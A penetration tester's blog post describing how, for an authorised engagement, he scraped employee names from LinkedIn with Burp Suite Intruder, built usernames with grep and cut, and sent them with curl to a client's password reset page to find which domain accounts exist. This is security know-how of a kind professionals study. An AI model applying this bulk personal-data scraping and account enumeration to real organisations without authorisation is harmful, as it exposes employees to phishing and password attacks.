Social Engineering – Scraping Data from Linkedin

Summary: A method and scripts to grab bulk data from Linkedin profiles and format it, using Burpsuite, curl, grep and cut. In this case to create a username list for identifying emails and domain accounts.

Foundation:
I was performing a relatively unique task for a social engineering engagement for a client. Normally I’ll just receive a list of email accounts and/or phone numbers of specific users the client wishes to test. In this case they didn’t want to provide ANY information at all. They wanted to see what I would be able to find and then target those users.

I started with the usual google searches looking for pertinent data and found a little. Used metagoofil and theHarvester as well, which turned up about 20 valid accounts. During my googling I found a very interesting portal page that allowed users to reset their domain passwords. I wasn’t interested in brute forcing any accounts (yet), but was able to use the functionality to test for valid accounts. I browsed to a webpage detailing some of the executives at the company and tried varying combinations of their names to find the format they used to create accounts. It turned out to be first initial last name, not surprisingly.

I then turned my attention to Linkedin and found over 1800 existing employees. If I could just grab all the names of employees and then format them I could then fire this list of usernames at the portal page to get a large list of valid user accounts. How best to do this?

Unfortunately Linkedin is one of the worst designed websites for automating this. If I were able to change the number of results per page I could simply do this manually and it wouldn’t take long. For example if I could return 100 results per page that would only be 18 pages to save manually and then grep out the profile names. That wouldn’t be so bad to save 18 pages manually. Unfortunately Linkedin has it hardcoded that you can only view 10 results per page. It looks like the limit might be 25 results for the Linkedin API, but the actual website appears to be limited to 10 per page. That means I’d have to browse to and save 180 pages manually, too much work. Thus trying to automate it with a script to crawl through each page, saving the output, looked like the best option.

To do this I used the intruder module of Burp Suite. I also needed a paid account for Linkedin, otherwise you would just see their first name and last initial. I borrowed an account (legitimately) from a friend and logged into Linkedin. This captured the request using the proxy intercept feature. I found the request for the search results page in history, right clicked and chose ‘send to intruder’.

On the positions tab for intruder you can see the HTTP request from the client. There are many variables as part of this GET request so the first step is to remove all of them with the ‘Clear §’ button. This removes all the variables that intruder will manipulate. Next select the page_num variable and select the ‘Add §’button.
Note that I changed the variable Keyword=ORG_NAME to protect the client, in reality it was just the organizations name. The attack type doesn’t necessarily matter for this test because we’re only manipulating a single variable, for the difference between the attack types check out the portswigger website.

Now select the payloads tab and choose numbers in the payload set dropdown. This section is pretty self explanatory. We want the page numbers to walk through every number from 1 to 180 and the step defines how much it increments each time. Once you’re ready click Intruder -> Start Attack.

Once the attack has completed you can highlight all the requests, right click and choose ‘save selected items’. Choose a folder and all the contents of the requests will be saved in one file. This works perfectly for what we’re trying to do as we can simply grep out the first and last name.

There were a few locations in the html file that had the persons first and last name. The one that seemed like it would be the easiest to manipulate were part of a link that looked like this
<a href="http://www.linkedin.com/people/invite?from=profile&key=2540332&firstName=Tyler&lastName=Wrightson&amp&#8230;

So to grab all the names I grepped for that page with the command;

grep "people\/invite" burpsuite.txt | cut -d";" -f3,4 >> names.txt

Then I put them in a nice format using search and replace in vi
vi
%s/firstName=//g
%s/&lastName=/ /g
%s/&amp//g

I also noticed that some usernames had plus and percent sign symbols for additional information like using a nickname in quotes for their title. Because there were only a few I went through and manually removed them to make sure that it didn’t interfere with their last name.

Now we have a perfectly constructed list of first name and last name separated by a space.

#grab first initials with
cat names.txt | cut -c1 >> first_initial.txt
#grab last names with
cat names.txt | cut -d " " -f2 >> last_names.txt

Because there was an even amount of items I simply pasted each of these files manually into an excel spreadsheet, saved the spreadsheet as a csv and then I could manipulate them as needed. In this case I simply did a search and replace on the comma to replace with nothing and voila, 485 account names to test in a perfect newline delimited file.

Next I created a perl script to use each name in the file to construct a large post data file to be used by curl. The name of the file was $USERNAME.post
I then used curl to hit the password page with each of the usernames like so
curl --data $_.post https://client.com/reset_password.aspx >> $_.response\n";

*Note that this is also not the actual name of the client’s password reset page.

This took the data in the USERNAME.post file, sent the request to the password reset page and saved the output as USERNAME.response. Thus I could then grep for a string that indicated a correct login in all of the .response files and grep would give me the name of the user that was valid as part of the file name. I did this in part because the username was not spit back at the user in the html of the page.

When this was all complete I had 110 valid domain usernames! Not bad for a start. I then wanted to remove those legitimate names from the larger list so that I could target the valid credentials differently than the potentially valid account names. I did this with the following command

#remove duplicate entries between two files with
comm -3 full_list.txt valid_accounts.txt >> possible_names.txt

4 comments

  1. Thanks for the share Tyler, handy read.

  2. Hi Tyler, thanks for sharing.
    I’m trying to get bulk companies data from linkedin like # of employees.
    Do you have any idea how I should go to get it done?

    1. twrightson · · Reply

      You can pretty much follow the example here. I know the LinkedIn page structure has changed a little bit as I had to do this recently and the variables were a little different but the concept is exactly the same. Feel free to email me or hit me up on twitter if you get stuck.

Leave a reply to twrightson Cancel reply